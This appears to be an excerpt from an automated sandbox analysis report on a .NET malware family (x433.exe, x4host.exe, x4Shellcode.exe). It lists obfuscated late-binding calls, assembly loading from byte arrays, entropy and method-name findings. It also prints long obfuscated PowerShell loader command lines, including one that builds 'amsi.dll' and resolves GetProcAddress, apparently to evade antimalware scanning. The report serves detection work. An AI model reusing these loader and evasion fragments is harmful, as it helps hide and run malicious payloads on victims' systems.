                      Source: 0.2.x433.exe.29b77d8.1.raw.unpack, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.k1dFRPlIGo1RTvRjnXMTxWfy6rA6wb04XVXXgyuhzervWpFow2aKTZxPPAhi2ObTh0OiRmNAWFz65LSgKc5e5PAg,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.NCrWGNhDUjKd4bDw1z4BZBIvFqbvbwlqLKOj3VQUYJmNb6dx8D8FECk38FnZYn3wQs7994mFYgPZWW6ZZqVhhef3,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.pCDeg8Pi40eWuzUFiMHVM4fQZLPXfikQ4VJGywZtMiDPKpgoHP1iqh3HhjRT2ndTBoGATXnC7UPztmPNrFeSPa1w,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1._9jIq11pOiUTPkTJ76ybIKboztPb3B1sCO5R9orQ37qX7P9J0r8ctqtC6Ka1YZnzF72XuHNlpWAY5dDX2mSITmSaS,etNX0TntxxQcULpBdpvLQMPzQQj7vk.ttGbKN3IQCFg51R()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpack, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{XnFsuZOMgti1ZJ2M7oLi9mifPt8tYB[2],etNX0TntxxQcULpBdpvLQMPzQQj7vk.hzgThPBBZDd3tmW(Convert.FromBase64String(XnFsuZOMgti1ZJ2M7oLi9mifPt8tYB[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: x4usb.exe.2.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.k1dFRPlIGo1RTvRjnXMTxWfy6rA6wb04XVXXgyuhzervWpFow2aKTZxPPAhi2ObTh0OiRmNAWFz65LSgKc5e5PAg,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.NCrWGNhDUjKd4bDw1z4BZBIvFqbvbwlqLKOj3VQUYJmNb6dx8D8FECk38FnZYn3wQs7994mFYgPZWW6ZZqVhhef3,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.pCDeg8Pi40eWuzUFiMHVM4fQZLPXfikQ4VJGywZtMiDPKpgoHP1iqh3HhjRT2ndTBoGATXnC7UPztmPNrFeSPa1w,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1._9jIq11pOiUTPkTJ76ybIKboztPb3B1sCO5R9orQ37qX7P9J0r8ctqtC6Ka1YZnzF72XuHNlpWAY5dDX2mSITmSaS,etNX0TntxxQcULpBdpvLQMPzQQj7vk.ttGbKN3IQCFg51R()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: x4usb.exe.2.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{XnFsuZOMgti1ZJ2M7oLi9mifPt8tYB[2],etNX0TntxxQcULpBdpvLQMPzQQj7vk.hzgThPBBZDd3tmW(Convert.FromBase64String(XnFsuZOMgti1ZJ2M7oLi9mifPt8tYB[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: x4host.exe.0.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs.Net Code: Zqmy8YoOiD6vkJ4QUa6qotcMjyzvtw System.AppDomain.Load(byte[])
                      Source: x4host.exe.0.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs.Net Code: ohdrG5IJE4RXttz6wzxNRbjo11VI02 System.AppDomain.Load(byte[])
                      Source: x4host.exe.0.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs.Net Code: ohdrG5IJE4RXttz6wzxNRbjo11VI02
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpack, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs.Net Code: Zqmy8YoOiD6vkJ4QUa6qotcMjyzvtw System.AppDomain.Load(byte[])
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpack, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs.Net Code: ohdrG5IJE4RXttz6wzxNRbjo11VI02 System.AppDomain.Load(byte[])
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpack, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs.Net Code: ohdrG5IJE4RXttz6wzxNRbjo11VI02
                      Source: x4usb.exe.2.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs.Net Code: Zqmy8YoOiD6vkJ4QUa6qotcMjyzvtw System.AppDomain.Load(byte[])
                      Source: x4usb.exe.2.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs.Net Code: ohdrG5IJE4RXttz6wzxNRbjo11VI02 System.AppDomain.Load(byte[])
                      Source: x4usb.exe.2.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs.Net Code: ohdrG5IJE4RXttz6wzxNRbjo11VI02
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($JhuBDoUfjiRKob,$tYvGzbpkOpfGRXdvJJH).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+'l'+[Char](108)+'');$nrzKdroJBYOrdatEY=$VrBFKSFCQkTmpL.Invo
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+'W'+''+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](120)+''+'4'+''+[Char](115)+''+[
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rLleiAFHAZAE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OsygfxRUYuIQnc,[Parameter(Position=1)][Type]$MbVaDjEwaI)$reLCkliZwnS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+'M'+'o'+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('My'+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate'+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](80)+''+'u'+'bl'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+'d'+','+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+'la'+[Char](115)+''+'s'+','+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$reLCkliZwnS.DefineConstructor(''+[Char](82)+''+'T'+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+'a'+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+'i'+'deByS'+'i'+''+'g'+''+[Char](44)+''+'P'+''+'u'+''+'b'+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$OsygfxRUYuIQnc).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',M'+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+'e'+''+'d'+'');$reLCkliZwnS.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+'deB'+'y'+''+'S'+'i'+[Char](103)+','+'N'+'ew'+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+'Vi'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+'l'+'',$MbVaDjEwaI,$OsygfxRUYuIQnc).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+'t'+''+'i'+'me'+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $reLCkliZwnS.CreateType();}$GGVrSjgYYZyVF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+''+'e'+'m.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t.Wi'+[Char](110)+'32.'+'U'+''+[Char](110)+''+'s'+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+'eth'+'o'+''+[Char](100)+''+'s'+'');$VrBFKSFCQkTmpL=$GGVrSjgYYZyVF.GetMethod(''+'G'+''+[Char](101)+'tPr'+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+[Char](101)+'s'+'s'+''
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rLleiAFHAZAE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OsygfxRUYuIQnc,[Parameter(Position=1)][Type]$MbVaDjEwaI)$reLCkliZwnS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+'M'+'o'+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('My'+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate'+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](80)+''+'u'+'bl'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+'d'+','+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+'la'+[Char](115)+''+'s'+','+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$reLCkliZwnS.DefineConstructor(''+[Char](82)+''+'T'+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+'a'+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+'i'+'deByS'+'i'+''+'g'+''+[Char](44)+''+'P'+''+'u'+''+'b'+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$OsygfxRUYuIQnc).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',M'+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+'e'+''+'d'+'');$reLCkliZwnS.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+'deB'+'y'+''+'S'+'i'+[Char](103)+','+'N'+'ew'+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+'Vi'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+'l'+'',$MbVaDjEwaI,$OsygfxRUYuIQnc).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+'t'+''+'i'+'me'+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $reLCkliZwnS.CreateType();}$GGVrSjgYYZyVF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+''+'e'+'m.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t.Wi'+[Char](110)+'32.'+'U'+''+[Char](110)+''+'s'+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+'eth'+'o'+''+[Char](100)+''+'s'+'');$VrBFKSFCQkTmpL=$GGVrSjgYYZyVF.GetMethod(''+'G'+''+[Char](101)+'tPr'+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+[Char](101)+'s'+'s'+''
                      Source: C:\Users\user\Desktop\x433.exeCode function: 0_2_00007FFD9B8900BD pushad ; iretd 0_2_00007FFD9B8900C1
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0042E00A push ds; ret 1_2_0042E010
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0042D0B0 push ds; ret 1_2_0042D0B1
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0042F161 push 100077DBh; ret 1_2_0042F16B
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0042D17B push cs; ret 1_2_0042D17C
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0042A34B push esi; iretd 1_2_0042A34C
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0078CBD0 push 0078C329h; ret 1_2_0078BFF5
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0078CBD0 push 0078C05Bh; ret 1_2_0078C0AF
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0078CBD0 push 0078C416h; ret 1_2_0078C14F
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0078CBD0 push 0078C6BEh; ret 1_2_0078C196
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0078CBD0 push 0078C439h; ret 1_2_0078C1AC
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0078CBD0 push 0078C599h; ret 1_2_0078C1E3
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0078CBD0 push 0078C471h; ret 1_2_0078C1FB
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0078CBD0 push 0078BECFh; ret 1_2_0078C2FC
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0078CBD0 push 0078C6CDh; ret 1_2_0078C390
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0078CBD0 push 0078C2FFh; ret 1_2_0078C3AE
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0078CBD0 push 0078C532h; ret 1_2_0078C45A
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0078CBD0 push 0078C23Ch; ret 1_2_0078C597
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0078CBD0 push 0078C08Dh; ret 1_2_0078C639
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0078CBD0 push 0078C63Eh; ret 1_2_0078C67B
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0078CBD0 push 0078C198h; ret 1_2_0078C72A
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0078CBD0 push 0078CC2Ch; ret 1_2_0078CBE3
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0078CBD0 push 0078CBFEh; ret 1_2_0078CC1D
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0078CBD0 push 0078CBE6h; ret 1_2_0078CC40
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_00788550 push 0078852Eh; ret 1_2_00787F3A
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_00788550 push 00788514h; ret 1_2_00787F66
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_00788550 push 00787E66h; ret 1_2_00788057
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_00788550 push 0078817Ah; ret 1_2_0078808B
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_00788550 push 007882E5h; ret 1_2_007880D9
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_00788550 push 0078826Ah; ret 1_2_0078819E
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_00788550 push 0078849Ch; ret 1_2_007881E4
                      Source: x433.exeStatic PE information: section name: .text entropy: 7.996675267651461
                      Source: x4Shellcode.exe.0.drStatic PE information: section name: .reloc entropy: 7.935386017883638
                      Source: x4host.exe.0.dr, xfwOCj1PDUkyxHJ.csHigh entropy of concatenated method names: 'reqGHXI3G9wXso5', 'A3d5XBF2z5oVzdx', 'eM62vnBwLjHrGH0', 'a26UulBrBUIfuU8QpVdSBT5Y3', 'YnSkjpcwirB2DXcYUxXJJeLWI', 'ixkWVXbVwenR10cANu7dJKP7g', 'mYx4myPdes6v7IW2guHXEk0XM', 'USsEupRWAqKevrdsDYC30x7bu', '_6XZAKoQQgtBVHjhY9SsBP8xLt', 'vZHNXXe8F6yEh1yOyQfUiLBS9'
                      Source: x4host.exe.0.dr, hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.csHigh entropy of concatenated method names: 'rWnjj3kE8i3rPLazoNf2St5AvccdZSJzR', 'sK0plnUhQjmhNNHfuS67N2yUQVQz4JiDZ', '_53WT8ngowxa7xthsXFFK8XeCjlHGk5Xmj', 'QD4jyzyxsnE0p6sTm96SrGfkWZdAoVoIk'
                      Source: x4host.exe.0.dr, oqXYL7IBPbaOrkCLfAY49RFSxlJrU3xfS77bdqqQ5SraRAZwMVptFdt.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_1pKE2dRjC82lv6NlWDIGaThfWYlfx4Vo4', 'mTqpVonBrB3IDzdoyAwNFf98atXrckdFf', 'PQAExrLV3pDxmbwvvKsu4AWoINLVIjAvI', 'XPSWdY17exp3KlEhvfjyng5wzdFRgqDIo'
                      Source: x4host.exe.0.dr, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.csHigh entropy of concatenated method names: '_9KmzWj2mwalDOEBlyNP2RUmHGVJB0Z', 'oNXUpbPnIS5Rns1h69KZvbAfoRftvh', '_4jJu4Ia8z76oSV28Fbxqh2YxmM07G3', 'riqvGqOv1KqQr5kNYYUa2zhmrrkhvN', 'X1OxpIzLyhBl4TmbQKUQPdwhwgIGFJ', '_4kYSuRCBtXmtF4hZe7PcbiBTtCaVIg', '_45JikAg8ztoISYnTCTSKoerahn7Fh8', 'ftJZQZj46Ym8TmBooihlwWVW6mc6Qs', '_4mwLd6KxylnKnpZdEn9yb2RylClmkg', '_43NfPF5LUzaG2UCFRfZoKd43V2Y71J'
                      Source: x4host.exe.0.dr, etNX0TntxxQcULpBdpvLQMPzQQj7vk.csHigh entropy of concatenated method names: 'E6lcacwk2Om4Jre8Zxlnx2uuwE3DSa', 'nEAfdyNliOQh4RbARZ4Mjrvp3lU9pw', 'H8c3AG7ObEKhDaQZQGLQNSaeOEF1MJ', 'CPxSbcTtcwCHCECL8MoBfAM4Ty8FRv', 'hbFWqMrhwX3iTTU', 'F2nHLZLu6dLkjSs', 'ozzr0SK9SyLkHPg', 'fIUf7QsKIygwHOo', '_6ZiCijBXyYwGoVC', 'dRhGyU4nmdwkQ0r'
                      Source: x4host.exe.0.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.csHigh entropy of concatenated method names: 'MuXxwXMdWpj7xWfZCFLL3ajC86y3HE', 'Zqmy8YoOiD6vkJ4QUa6qotcMjyzvtw', 'GDO8A3hX6t4WEqwjwDmkN9QX1di8dA', '_5r19egLavdE3pWQeJ25pnksK8bXRUF', 'hTZmQb61o9zj5OrkvKSmDe6Dn0YcwV', '_8ZLzAgSEWrGxT2bsbvXNRGhoqnDFts', 'COTHbvM7SEhrqKoXNPnzOeAV5YgdKV', 'Jz8IH3YoK4J9mxv3FUpFYpuTYdowWR', 'TBxbKfZSmgHZ9whZ3JbDGlqvOrEfna', 'MhOzbgjjU4AbicRDgrjOYm29se7kjw'
                      Source: x4host.exe.0.dr, 2GeJGBZ9s7f00k3MrIG6jUSZ27JzDpdLtJapZiFUDiIPvwDFAaMrisXFq17tsOrZFaIFb6cVJvf4N9MUGa9BFHlG.csHigh entropy of concatenated method names: 'z1LzC6OirZQYgRajqkXBhte5gh9cv4LgGo3P1E2BJiHNBuOSiZJigIuiAkPFEDHCDVm4JYf9fwPOeIqIlhVif8jd', 'HCuQxWK61KjHlQFB3M0c4VHJAaL6HrtPZDHGB8NaNSZq6UkCD0sKzCXaSPWKon2xn7FWCpURH9umJNAI5wdFooOO', '_1WMMCf1RCWPIZjJAw5BK2pk7i0eukKPmEt4AeDUNcJ7JnLAVp1iAzXJuj91qkclSY3GnfmyL5AV9RiknQciWCej7', 'WakgiKHdUOu78VuIIKHZ8zGfJ34jFVbA1LIqQTZlGEjfUnSEU8p85cj0GZzXVZeDdbSRPUcLb8ClWbJM4VPmJ9iw', 'kYkGiTHBpkN4O55gQqmuNZa55cxWW239wKIErOIZL2UdORA3BMlJ9P29ysS8z4uHaz3WQqkwgNodyhcstP3NBaw9', 'AWq5zbRm4tFVd34LPvDKiiEM3AMmOYr01Yx2btbKOEixxWORG3DLG2pPf3JPv1GnhTWTIc3QTE7RxXDDqSUoq2sB', 'ErFN0wMw3jBZKG8RpL7gOeUUeMzXUQeuP98eTqAgR5mYRoGPnH45UPYSv89wOFV2THc6uSTjPClTbRCnZ7Qz6wKk', 'q8opKTgZkDsYXfN2NJLUEevH0yTqFb4r5IsoBmPy5iYX6ajuruWSA6kC40jSandPrrkT8GIPykkQciP4NE9snONl', 'UfyPTB51UMnUJ4m08aCQ5xJbrmtLG4', 'zoFPojQVB5ILw3JamQNmwW2ZDKvWyA'
                      Source: x4host.exe.0.dr, vthpzjkPbD10MqQvse8d9fgJdMuC69.csHigh entropy of concatenated method names: '_4FWlZlOv9mJvgefZ0oZnm4oehhLgu7', 'lnELcVdQS1KjcheIGYrB4ncZtrtGJ1', 'khljFe8k3eynRCcPUrTtQcLDJSfYdW', '_3pHprr9Uje78hOKmIDBwm74LcLR0gf', 'Y5J6lR8AXCpHirkDqZHu1AxA9OvKJbnJTugtJarDfVGeTU8peTob1op3HF6Nhe5YT0xNJjLPbNs6oEbgQGPe4LnhRTvQboc6N', 'bhaqJNHS2LH8epigaJtBlgMA2LQbW4n33Lgwf215UT60eyD9EHmyNDEWkVlik8c6jEl3iOysXcy9cIlscLLrmBhYyTQgafHw7', 'TlCcWOPNdmYoiwcRNmDsu3nZpJt9JjHfl647IMjnHYXDgPBs9vDpl2W2Zi09X0tLuME6YggpUOZZKmc59tFSy73v8AaSjeH3L', '_0RTp1iMhbSwasiCO1wAvDGgmeICOBLbCdi0UHWmgt5R6ftDE92322bTynImnNZe0NJWfGFeRYjPkUaF2d2N2kyeiYXBZ0Pd2s', 'ezUslj75uOCTADP6qP5EUIYwDx51Bo18aSlvhYg0ygBxP6fectATG16mbwziR5jIer6tycwZJOVw5TpWpnGDNwIfVzn5lAWLE', 'K6HJdPff3bNq0gfmsoCxocbF6Eyi361PVuyR3ArlJfkLRsWX9RI9Q9SiBYnuSiLG69BuhvE23aOFXboZJNozy7lvQoyJGQ84q'
                      Source: x4host.exe.0.dr, KgvNpQFD1pgyslmvoLVzYtqStdU0vY.csHigh entropy of concatenated method names: '_8OqKNdBpQOiP48byjobgpYdKjvomXU', 'bSMJ4wPTjULuRIGy20UVskepWllP8tk4XXKMa9hhWQ4xSP9EjJMUqTPO4upHSn5rtUuCwfq9Gr4oZSRYZE5uKPuqxQKdonuya', 'wKT6cqounpHYRYFCkj4gBtSbVwIDF60ELB01T92h8bh6mYlu0i92K6L8ZXsf4XHyaAi0s6qGfXrcIK6okzaEJXTR1NZBhKKJ3', 'FQKjPf2hqoC1UlXmUSQMOVlJtO41IdIgkPZql4wdu4YM059Qm8JumuCUvPqQvXel1aTrhIdZcx7JdoYlxAavrNAiKQ4Cqx3a6', 'p2o0lampFTBN00Sl2Ly0kao2KUg8HEgfgNWBsGWwrRNVRf3xcSm1prkmpTZ37cJnWU6TxDbV3JzbDLvYcTDQMtw0REG1BG3Eo'
                      Source: x4host.exe.0.dr, EnDrnZVI21QanoXDv7V6tpRAyEeGc3.csHigh entropy of concatenated method names: 'OJnYUbLkwSxKjmU6fKV2Hlw1IQDrrJ', 'tvU9fWfrnnauFESq3CZMjJqgWzCcQiVr8uOuybtYGmaAmLPTrBRbSmpeagqUwJ0IALVMMAlEq32BxT15HJetiYKVXqlBwiRN1', 'k27RKeDihzBbcaefRpL4TKPMWxclxn8k5c0RxZP7mcnpWucKutGtmjKZrYx20HvHIzkMsxzKuui79OmMLiSyzphYgEiKf93jl', 'Kdk7fsQFZWfb1NTSDwX0JpPEu3wN1ciOsKyPwnWHaTkkzFYlgvY2wLJUeOMcOnyeSOxZT6WHdCzt3OQdLa8', 'ZNCH16SUBJBa1infvnuYgiLTJaADVvvCpDUyOhAylbPs8EBspiKDd2NBofvowFjy7xlhRV6MgZ2dosI75Nq'
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpack, xfwOCj1PDUkyxHJ.csHigh entropy of concatenated method names: 'reqGHXI3G9wXso5', 'A3d5XBF2z5oVzdx', 'eM62vnBwLjHrGH0', 'a26UulBrBUIfuU8QpVdSBT5Y3', 'YnSkjpcwirB2DXcYUxXJJeLWI', 'ixkWVXbVwenR10cANu7dJKP7g', 'mYx4myPdes6v7IW2guHXEk0XM', 'USsEupRWAqKevrdsDYC30x7bu', '_6XZAKoQQgtBVHjhY9SsBP8xLt', 'vZHNXXe8F6yEh1yOyQfUiLBS9'
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpack, hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.csHigh entropy of concatenated method names: 'rWnjj3kE8i3rPLazoNf2St5AvccdZSJzR', 'sK0plnUhQjmhNNHfuS67N2yUQVQz4JiDZ', '_53WT8ngowxa7xthsXFFK8XeCjlHGk5Xmj', 'QD4jyzyxsnE0p6sTm96SrGfkWZdAoVoIk'
